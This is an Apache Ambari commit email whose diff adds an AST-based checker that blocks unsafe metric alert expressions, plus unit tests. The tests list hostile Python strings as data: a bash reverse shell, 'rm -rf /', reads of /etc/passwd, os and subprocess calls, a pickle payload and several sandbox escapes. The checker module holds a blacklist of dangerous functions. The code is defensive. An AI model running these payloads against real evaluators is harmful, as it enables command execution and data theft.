This is an automated email from the ASF dual-hosted git repository.

jialiang pushed a commit to branch branch-2.7
in repository https://gitbox.apache.org/repos/asf/ambari.git


The following commit(s) were added to refs/heads/branch-2.7 by this push:
     new c8cd397205 AMBARI-26202: Fix metrics issue (#3886)
c8cd397205 is described below

commit c8cd3972058f907c404166ef4252bd2e62338bea
Author: jialiang <[email protected]>
AuthorDate: Fri Nov 22 09:33:01 2024 +0800

    AMBARI-26202: Fix metrics issue (#3886)
---
 .../main/python/ambari_agent/alerts/ams_alert.py   |   8 +
 .../python/ambari_agent/alerts/metric_alert.py     |   6 +
 .../src/test/python/ambari_agent/TestASTChecker.py | 449 +++++++++++++++++++++
 .../src/main/python/ambari_commons/ast_checker.py  | 402 ++++++++++++++++++
 4 files changed, 865 insertions(+)

diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py 
b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
index 4f59143189..09a77d884d 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
@@ -30,6 +30,7 @@ import uuid
 
 from resource_management.libraries.functions.get_port_from_url import 
get_port_from_url
 from ambari_commons import inet_utils
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
 
 logger = logging.getLogger(__name__)
 
@@ -210,9 +211,13 @@ def f(args):
     self.interval = metric_info['interval'] # in minutes
     self.app_id = metric_info['app_id']
     self.minimum_value = metric_info['minimum_value']
+    self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
 
     if 'value' in metric_info:
       realcode = re.sub('(\{(\d+)\})', 'args[\g<2>][k]', metric_info['value'])
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("AmsMetric: Value expression {} is not safe,blocked 
by checker".format(realcode))
+        raise Exception("AmsMetric: Value expression {} is not 
safe".format(realcode))
 
       self.custom_value_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_VALUE_TEMPLATE.format(realcode)
@@ -220,6 +225,9 @@ def f(args):
 
     if 'compute' in metric_info:
       realcode = metric_info['compute']
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("AmsMetric: compute expression {} is not safe,blocked 
by checker".format(realcode))
+        raise Exception("AmsMetric: compute expression {} is not 
safe".format(realcode))
       self.custom_compute_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_COMPUTE_TEMPLATE.format(realcode)
       exec code in self.custom_compute_module.__dict__
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py 
b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
index 94da8d33bf..b5924a1f5b 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
@@ -32,6 +32,7 @@ from 
resource_management.libraries.functions.get_port_from_url import get_port_f
 from resource_management.libraries.functions.curl_krb_request import 
curl_krb_request
 from ambari_commons import inet_utils
 from ambari_commons.constants import AGENT_TMP_DIR
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
 
 logger = logging.getLogger(__name__)
 
@@ -287,10 +288,15 @@ def f(args):
     self.custom_module = None
     self.property_list = jmx_info['property_list']
     self.property_map = {}
+    self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
 
     if 'value' in jmx_info:
       realcode = re.sub('(\{(\d+)\})', 'args[\g<2>]', jmx_info['value'])
 
+
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("The expression {} is not safe,blocked by 
checker".format(realcode))
+        raise Exception("The expression {} is not safe".format(realcode))
       self.custom_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_TEMPLATE.format(realcode)
       exec code in self.custom_module.__dict__
diff --git a/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py 
b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
new file mode 100644
index 0000000000..6fd1f4f0e1
--- /dev/null
+++ b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
@@ -0,0 +1,449 @@
+#!/usr/bin/env python2
+
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import unittest
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
+from ambari_agent.alerts.metric_alert import JmxMetric
+from ambari_agent.alerts.ams_alert import AmsMetric
+
+class TestJmxMetric(unittest.TestCase):
+  def test_jmx_metric_calculation(self):
+    jmx_info = {
+      'property_list': ['a/b', 'c/d'],
+      'value': '({0} + {1}) / 100.0'
+    }
+    metric = JmxMetric(jmx_info)
+    result = metric.calculate([50, 50])
+    self.assertEqual(result, 1.0)
+
+  def test_jmx_metric_with_complex_calculation(self):
+    jmx_info = {
+      'property_list': ['x/y', 'z/w'],
+      'value': 'max({0}, {2}) / min({1}, {3}) * 100.0'
+    }
+    metric = JmxMetric(jmx_info)
+    result = metric.calculate([100, 50, 200, 25])
+    self.assertEqual(result, 800.0)
+
+  def test_jmx_metric_with_string_manipulation(self):
+    jmx_info = {
+      'property_list': ['str1/value', 'str2/value'],
+      'value': "len({0}) + len({1})"
+    }
+    metric = JmxMetric(jmx_info)
+    result = metric.calculate(['hello', 'world'])
+    self.assertEqual(result, 10)
+
+  def test_jmx_metric_with_unsafe_operation(self):
+    jmx_info = {
+      'property_list': ['a/b'],
+      'value': "__import__('os').system('echo hacked')"
+    }
+
+    with self.assertRaises(Exception):
+      JmxMetric(jmx_info)
+
+class TestAmsMetric(unittest.TestCase):
+  # Safe test cases
+  def test_safe_simple_calculation(self):
+    metric_info = {
+      'metric_list': ['a', 'b'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'args[0][k] + args[1][k]'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': 10}, {'k': 20}])
+    self.assertEqual(result, [30])
+
+  def test_safe_complex_calculation(self):
+    metric_info = {
+      'metric_list': ['x', 'y', 'z'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'max(args[0][k], args[1][k]) / min(args[1][k], args[2][k]) * 
100.0'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': 100}, {'k': 50}, {'k': 25}])
+    self.assertEqual(result, [400.0])
+
+  def test_safe_string_manipulation(self):
+    metric_info = {
+      'metric_list': ['str1', 'str2'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'len(str(args[0][k])) + len(str(args[1][k]))'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': 'hello'}, {'k': 'world'}])
+    self.assertEqual(result, [10])
+
+  def test_safe_list_comprehension(self):
+    metric_info = {
+      'metric_list': ['numbers'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'sum([x for x in args[0][k] if x > 5])'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': [1, 6, 2, 7, 3, 8]}])
+    self.assertEqual(result, [21])
+
+  def test_safe_dict_manipulation(self):
+    metric_info = {
+      'metric_list': ['data'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'sum(args[0][k].values())'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': {'a': 1, 'b': 2, 'c': 3}}])
+    self.assertEqual(result, [6])
+
+  def test_safe_conditional_expression(self):
+    metric_info = {
+      'metric_list': ['x', 'y'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'args[0][k] if args[0][k] > args[1][k] else args[1][k]'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': 10}, {'k': 20}])
+    self.assertEqual(result, [20])
+
+  def test_safe_boolean_operations(self):
+    metric_info = {
+      'metric_list': ['a', 'b', 'c'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': 'int(args[0][k] > 0 and args[1][k] < 10 or args[2][k] == 5)'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_value([{'k': 1}, {'k': 5}, {'k': 5}])
+    self.assertEqual(result, [1])
+
+  def test_safe_compute_mean(self):
+    metric_info = {
+      'metric_list': ['numbers'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'compute': 'mean'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertEqual(result, 3)
+
+  def test_safe_compute_standard_deviation(self):
+    metric_info = {
+      'metric_list': ['numbers'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'compute': 'sample_standard_deviation'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertAlmostEqual(result, 1.4142, places=4)
+
+  def test_safe_compute_count(self):
+    metric_info = {
+      'metric_list': ['numbers'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'compute': 'count'
+    }
+    metric = AmsMetric(metric_info)
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertEqual(result, 5)
+
+  # Unsafe test cases
+  def test_unsafe_import(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "__import__('os').system('echo hacked')"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_eval(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "eval('2 + 2')"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_exec(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "exec('x = 5')"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_open_file(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "open('/etc/passwd', 'r').read()"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_subprocess(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "__import__('subprocess').call(['ls', '-l'])"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_globals(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "globals()['__builtins__']"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_attribute_access(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "args.__class__.__bases__[0].__subclasses__()"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_pickle(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "__import__('pickle').loads(b'cos\\nsystem\\n(S\"echo 
hacked\"\\ntR.')"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_custom_function(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "lambda: __import__('os').system('echo hacked')"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+  def test_unsafe_builtin_override(self):
+    metric_info = {
+      'metric_list': ['a'],
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0,
+      'value': "__builtins__.__dict__['print'] = lambda x: exec(x)"
+    }
+    with self.assertRaises(Exception):
+      AmsMetric(metric_info)
+
+class TestBlacklistASTChecker(unittest.TestCase):
+  def setUp(self):
+    self.checker = ASTChecker([BlacklistRule()], use_blacklist=True)
+
+  def test_safe_expressions(self):
+    safe_expressions = [
+      # Original safe expressions
+      "mean",
+      "1.5",
+      "200",
+      "args[0] * 100",
+      "(args[1] - args[0])/args[1] * 100",
+      "args[0]",
+      "'[email protected]'",
+      "calculate(args[0])",
+      "args[0] + args[1]",
+      "args[0] > args[1]",
+      "args[0] and args[1]",
+      "not args[0]",
+      "-args[0]",
+      "args[0] ** 2",
+      "args[0] // 3",
+      "args[0] % 2",
+      "args[0][k]",
+      "args[1][k]",
+      "len(args[0])",
+      "max(args[0][k], args[1][k])",
+      "min(args[0][k], 10)",
+      "args[0][k] + args[1][k]",
+      "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+      "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+      "(args[0][k] + args[1][k] + args[2][k]) / 3",
+      "len(str(args[0][k]))",
+      "int(args[0][k]) if args[0][k] is not None else 0",
+      "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] < 
50 else args[0][k]",
+
+      # Safe expressions from test_expressions
+      "max(args[0], args[1])",
+      "len([1, 2, 3])",
+      "print('Hello, world!')",
+      "x = [i for i in range(10)]",
+      "def custom_function(x): return x * 2",
+      "class CustomClass: pass",
+      "try: 1/0\nexcept ZeroDivisionError: pass",
+      "safe_function([1, 2, 3])",
+
+      # Safe expressions from ams
+      "args[0][k]",
+      "args[1][k]",
+      "len(args[0])",
+      "max(args[0][k], args[1][k])",
+      "min(args[0][k], 10)",
+      "args[0][k] + args[1][k]",
+      "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+      "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+      "(args[0][k] + args[1][k] + args[2][k]) / 3",
+      "len(str(args[0][k]))",
+      "int(args[0][k]) if args[0][k] is not None else 0",
+      "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] < 
50 else args[0][k]",
+      "sample_standard_deviation_percentage(args)",
+      "sample_standard_deviation(args)",
+      "mean(args)",
+      "count(args)",
+    ]
+
+
+    for expr in safe_expressions:
+        try:
+          self.assertTrue(self.checker.is_safe_expression(expr), "Expression 
should be safe: {}".format(expr))
+        except Exception as e:
+          print("Error: {}, Expression should be safe: {}".format(e, expr))
+          raise
+
+  def test_unsafe_expressions(self):
+    unsafe_expressions = [
+      # Original unsafe expressions
+      "__import__('os').system('bash -i >& /dev/tcp/127.0.0.1/18888 0>&1')",
+      "open('/etc/passwd').read()",
+      "exec('malicious code')",
+      "exec('x = 5')",
+      "eval('dangerous_function()')",
+      "globals()['__builtins__']['__import__']('os').system('rm -rf /')",
+      "getattr(__import__('os'), 'system')('echo hacked')",
+      "(lambda: __import__('subprocess').call('ls'))()",
+      "__class__.__base__.__subclasses__()[40]('/etc/passwd').read()",
+      "import os; os.system('whoami')",
+      
"().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].system('ls')",
+      "args[0].__class__.__bases__[0].__subclasses__()",
+      "args[0].__dict__",
+      "args[0].__globals__",
+
+      # Unsafe expressions from test_expressions
+      "with open('file.txt', 'r') as f: content = f.read()",
+      "eval('1 + 1')",
+      "os.system('echo hello')",
+      "__import__('os').system('echo hello')",
+      "obj._private_method()",
+      "obj.__dict__",
+      "_hidden_function()",
+      "from module import _private_func",
+      "import _private_module",
+
+      # Additional unsafe expressions
+      "import subprocess; subprocess.Popen('ls', shell=True)",
+      "import pickle; pickle.loads(b'cos\\nsystem\\n(S\'echo 
hacked\'\\ntR.\')",
+      "__import__('os').popen('ls').read()",
+      "import importlib; importlib.import_module('os').system('echo hacked')",
+      "exec(\"__import__('os').system('echo hacked')\")",
+      "(lambda f: f(f))(lambda f: __import__('os').system('echo hacked') or 
f(f))",
+      "__builtins__.__dict__['__import__']('os').system('echo hacked')",
+      "globals().get('__builtins__').get('__import__')('os').system('echo 
hacked')",
+      "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 
'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('echo 
hacked')",
+      "next(c for c in {}.__class__.__bases__[0].__subclasses__() if 
c.__name__ == 'Popen')(['echo', 'hacked'])",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: 
__import__('os').system('echo hacked')})()['']",
+      
"().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].system('echo
 hacked')",
+      
"getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(__import__('os'),
 'path'), 'abspath'), '__globals__'), '__builtins__'), '__import__'), 
'__globals__'), '__builtins__'), '__import__'), '__globals__'), 
'__builtins__'), '__import__'), '__globals__'), '__builtins__'), 
'__import__')('os').system('echo hacked')",
+      "(__builtins__.__dict__['__import__']('functools').reduce(lambda f, n: 
getattr(f, n), ['__globals__', '__builtins__', '__import__'], 
__import__('os')))('os').system('echo hacked')",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: 
__import__('os').system('echo hacked')})()['']",
+      "(lambda fc=(lambda n: [c for c in 
().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]): 
fc('Popen')(['echo', 'hacked']))()",
+      "(lambda x: 
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo
 hacked')",
+      "getattr(__import__('ctypes'), 'windll', 
__import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: 
__import__('os').system('echo hacked')})()['']",
+      "next(filter(lambda x: x.__name__ == 'Popen', 
().__class__.__bases__[0].__subclasses__()))(['echo', 'hacked'])",
+      "(lambda fc=(lambda n: [c for c in 
().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]): 
fc('Popen')(['echo', 'hacked']))()",
+      "(lambda x: 
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo
 hacked')",
+      "getattr(__import__('ctypes'), 'windll', 
__import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+      
"(__import__('codecs').decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2VjaG8gaGFja2VkJyk=',
 'base64'))",
+      "compile('__import__(\\'os\\').system(\\'echo hacked\\')', '<string>', 
'exec')",
+      "locals()['__builtins__']['__import__']('os').system('echo hacked')",
+      "vars(__builtins__)['__import__']('os').system('echo hacked')",
+      "(lambda x: 
x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['eval']('__import__(\\'os\\').system(\\'echo
 hacked\\')')",
+      "(lambda x: 
x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['__import__']('os').system('echo
 hacked')",
+
+      "import os",
+      "open('file.txt', 'w')",
+      "eval('1 + 1')",
+      "exec('print(\"Hello\")')",
+      "__import__('os').system('ls')",
+      "globals()['__builtins__']['eval']('1+1')",
+      "args[0].__class__.__bases__[0].__subclasses__()",
+    ]
+
+    for expr in unsafe_expressions:
+        try:
+          self.assertFalse(self.checker.is_safe_expression(expr), "Expression 
should be unsafe: {}".format(expr))
+        except Exception as e:
+          print("Error: {}, Expression should be safe: {}".format(e, expr))
+          raise
+
+
+  def test_syntax_error(self):
+    expr = "(args[1] - args[0])/{args[1] * 100"
+    self.assertFalse(self.checker.is_safe_expression(expr), "Expression with 
syntax error should be unsafe: {}".format(expr))
+
diff --git a/ambari-common/src/main/python/ambari_commons/ast_checker.py 
b/ambari-common/src/main/python/ambari_commons/ast_checker.py
new file mode 100644
index 0000000000..9839b3b09f
--- /dev/null
+++ b/ambari-common/src/main/python/ambari_commons/ast_checker.py
@@ -0,0 +1,402 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/env python2
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import ast
+from abc import ABCMeta, abstractmethod
+
+import logging
+logger = logging.getLogger(__name__)
+"""
+This module provides a framework for checking the safety of Python code 
expressions.
+It includes abstract base classes for defining rule templates, concrete rule 
implementations,
+and an AST checker that applies these rules to validate code safety.
+"""
+
+class RuleTemplate(object):
+    """
+    Abstract base class for defining rule templates.
+    Subclasses should implement methods to specify allowed names, functions, 
node types,
+    and custom checks for AST nodes.
+    """
+    __metaclass__ = ABCMeta
+
+    @abstractmethod
+    def allowed_names(self):
+        """Return a set of allowed variable names."""
+        pass
+
+    @abstractmethod
+    def allowed_functions(self):
+        """Return a set of allowed function names."""
+        pass
+
+    @abstractmethod
+    def allowed_node_types(self):
+        """Return a set of allowed AST node types."""
+        pass
+
+    @abstractmethod
+    def custom_checks(self):
+        """Return a dictionary of custom check functions for specific AST node 
types."""
+        pass
+
+class DefaultRule(RuleTemplate):
+    """
+    A default implementation of RuleTemplate that provides a basic set of 
allowed
+    names, functions, node types, and no custom checks.
+    """
+
+    def allowed_names(self):
+        """Allow only 'args' as a variable name."""
+        return {'args'}
+
+    def allowed_functions(self):
+        """Allow a limited set of safe functions."""
+        return {'calculate', 'max', 'min', 'len'}
+
+    def allowed_node_types(self):
+        """Allow a comprehensive set of safe AST node types."""
+        return {
+            ast.Num, ast.Str, ast.Constant,
+            ast.Name, ast.Call, ast.BinOp, ast.UnaryOp,
+            ast.Compare, ast.BoolOp, ast.Subscript, ast.Index,
+            ast.Load, ast.Expression,
+            ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod, 
ast.Pow,
+            ast.UAdd, ast.USub,
+            ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
+            ast.And, ast.Or, ast.Not,
+            ast.Subscript, ast.Lambda, ast.IfExp, ast.If, ast.Return, 
ast.Continue
+        }
+
+    def custom_checks(self):
+        """No custom checks for the default rule."""
+        return {}
+
+class ASTChecker:
+    """
+    A class that checks the safety of Python code by analyzing its Abstract 
Syntax Tree (AST).
+    It applies a set of rules to determine if the code contains only allowed 
constructs.
+    """
+
+    def __init__(self, rules, use_blacklist = False):
+        """
+        Initialize the ASTChecker with a list of rules and a flag to use 
blacklist mode.
+
+        :param rules: List of RuleTemplate objects defining the safety rules.
+        :param use_blacklist: If True, use blacklist mode; otherwise, use 
whitelist mode.
+        """
+        self.rules = rules
+        self.use_blacklist = use_blacklist
+        if not use_blacklist:
+            self._compile_rules()
+
+    def _compile_rules(self):
+        """Compile all rules into combined sets of allowed constructs."""
+        self.allowed_names = set().union(*(rule.allowed_names() for rule in 
self.rules))
+        self.allowed_functions = set().union(*(rule.allowed_functions() for 
rule in self.rules))
+        self.allowed_node_types = set().union(*(rule.allowed_node_types() for 
rule in self.rules))
+
+        # Combine custom checks from all rules
+        self.custom_checks = {}
+        for rule in self.rules:
+            for node_type, check_func in rule.custom_checks().items():
+                if node_type in self.custom_checks:
+                    original_func = self.custom_checks[node_type]
+                    self.custom_checks[node_type] = lambda node, 
of=original_func, nf=check_func: of(node) and nf(node)
+                else:
+                    self.custom_checks[node_type] = check_func
+
+    def is_safe_expression(self, code):
+        """
+        Check if the given code string is a safe expression according to the 
defined rules.
+
+        :param code: The code string to check.
+        :return: True if the code is safe, False otherwise.
+        """
+        try:
+            # First, try to parse as an expression
+            tree = ast.parse(code, mode='eval')
+        except SyntaxError:
+            try:
+                # If that fails, try to parse as a statement
+                tree = ast.parse(code, mode='exec')
+            except SyntaxError:
+                logger.info("Syntax error in expression: {}".format(code))
+                return False
+
+        return self.is_safe_node(tree)
+
+    def is_safe_node(self, node):
+        """
+        Recursively check if an AST node and all its children are safe.
+
+        :param node: The AST node to check.
+        :return: True if the node and all its children are safe, False 
otherwise.
+        """
+        # Apply custom checks from all rules
+        for rule in self.rules:
+            custom_checks = rule.custom_checks()
+            for node_type, check_func in custom_checks.items():
+                if isinstance(node, node_type):
+                    if not check_func(node):
+                        return False
+
+        # Recursively check all child nodes
+        for child in ast.iter_child_nodes(node):
+            if not self.is_safe_node(child):
+                return False
+
+        return True
+
+    def _is_safe_node_blacklist(self, node):
+        """
+        Check if a node is safe using blacklist rules.
+
+        :param node: The AST node to check.
+        :return: True if the node is not blacklisted, False otherwise.
+        """
+        for rule in self.rules:
+            custom_checks = rule.custom_checks()
+            if type(node) in custom_checks:
+                if not custom_checks[type(node)](node):
+                    return False
+        return True
+
+    def _is_safe_node_whitelist(self, node):
+        """
+        Check if a node is safe using whitelist rules.
+
+        :param node: The AST node to check.
+        :return: True if the node is allowed, False otherwise.
+        """
+        if not isinstance(node, tuple(self.allowed_node_types)):
+            logger.info("Node type not allowed: 
{}".format(type(node).__name__))
+            return False
+
+        if isinstance(node, ast.Name):
+            if node.id not in self.allowed_names and node.id not in 
self.allowed_functions:
+                logger.info("Name not allowed: {}".format(node.id))
+                return False
+        elif isinstance(node, ast.Call):
+            if not isinstance(node.func, ast.Name) or node.func.id not in 
self.allowed_functions:
+                logger.info("Function call not allowed: 
{}".format(ast.dump(node.func)))
+                return False
+
+        node_type = type(node)
+        if node_type in self.custom_checks:
+            if not self.custom_checks[node_type](node):
+                logger.info("Custom check failed for node: 
{}".format(ast.dump(node)))
+                return False
+
+        # Recursively check child nodes
+        for child in ast.iter_child_nodes(node):
+            if not self.is_safe_node(child):
+                return False
+
+        return True
+
+    def print_ast_tree(self, code):
+        """
+        Print the AST tree of the given code string.
+
+        :param code: The code string to visualize.
+        """
+        try:
+            tree = ast.parse(code, mode='exec')
+            logger.info("AST Tree:")
+            self._print_node(tree, "", True)
+        except SyntaxError:
+            logger.info("Syntax error in expression: {}".format(code))
+
+    def _print_node(self, node, prefix, is_last):
+        """
+        Recursively print an AST node and its children.
+
+        :param node: The AST node to print.
+        :param prefix: The prefix string for the current line.
+        :param is_last: Whether this is the last child of its parent.
+        """
+        print prefix + ("└── " if is_last else "├── ") + type(node).__name__
+
+        # Prepare the prefix for child nodes
+        child_prefix = prefix + ("    " if is_last else "│   ")
+
+        # Get all fields of the node
+        fields = [(name, value) for name, value in ast.iter_fields(node)]
+
+        # Print fields and child nodes
+        for i, (name, value) in enumerate(fields):
+            is_last_field = i == len(fields) - 1
+
+            if isinstance(value, ast.AST):
+                self._print_node(value, child_prefix, is_last_field)
+            elif isinstance(value, list) and value and isinstance(value[0], 
ast.AST):
+                print child_prefix + ("└── " if is_last_field else "├── ") + 
name + ":"
+                for j, item in enumerate(value):
+                    self._print_node(item, child_prefix + "    ", j == 
len(value) - 1)
+            else:
+                print child_prefix + ("└── " if is_last_field else "├── ") + 
"{}: {}".format(name,value)
+
+class BlacklistRule:
+    """
+    A rule that defines a blacklist of dangerous functions, modules, and 
constructs.
+    It provides custom checks to ensure these blacklisted items are not used 
in the code.
+    """
+
+    def __init__(self):
+        """Initialize the blacklist of dangerous items and modules."""
+        self.blacklist = {
+            'eval', 'exec', 'compile', '__import__', 'open', 'file',
+            'os.system', 'subprocess.call', 'subprocess.Popen',
+            'pickle.loads', 'pickle.load', 'marshal.loads',
+            'builtins', '__builtins__', 'globals', 'locals', 'getattr',
+            'setattr', 'delattr', 'hasattr', 'importlib', 
'importlib.import_module',
+            'os', 'subprocess', 'sys', 'shutil', 'pty'
+        }
+        self.dangerous_modules = {'os', 'subprocess', 'sys', 'importlib', 
'pickle', 'marshal'}
+
+    def custom_checks(self):
+        """Return a dictionary of custom check functions for specific AST node 
types."""
+        return {
+            ast.Name: self._check_name,
+            ast.Call: self._check_call,
+            ast.Attribute: self._check_attribute,
+            ast.Import: self._check_import,
+            ast.ImportFrom: self._check_importfrom,
+            ast.Subscript: self._check_subscript,
+            ast.Module: self._check_module,
+            ast.Exec: self._check_exec,
+        }
+
+    def _check_exec(self, node):
+        return False
+
+    def _check_name(self, node):
+        """Check if a Name node is not in the blacklist and doesn't start with 
an underscore."""
+        if isinstance(node, ast.Name):
+            return node.id not in self.blacklist and not 
node.id.startswith('_')
+        return True
+
+    def _check_call(self, node):
+        """Check if a function call is safe."""
+        if isinstance(node.func, ast.Name):
+            return node.func.id not in self.blacklist and not 
node.func.id.startswith('_')
+        elif isinstance(node.func, ast.Attribute):
+            return self._check_attribute(node.func)
+        return True
+
+    def _check_attribute(self, node):
+        """Check if an attribute access is safe."""
+        full_name = self._get_attribute_name(node)
+        return full_name not in self.blacklist and not 
full_name.split('.')[-1].startswith('_')
+
+    def _check_import(self, node):
+        """Check if an import statement is safe."""
+        return all(alias.name not in self.dangerous_modules and not 
alias.name.startswith('_') for alias in node.names)
+
+    def _check_importfrom(self, node):
+        """Check if an import from statement is safe."""
+        if node.module in self.dangerous_modules or (node.module and 
node.module.startswith('_')):
+            return False
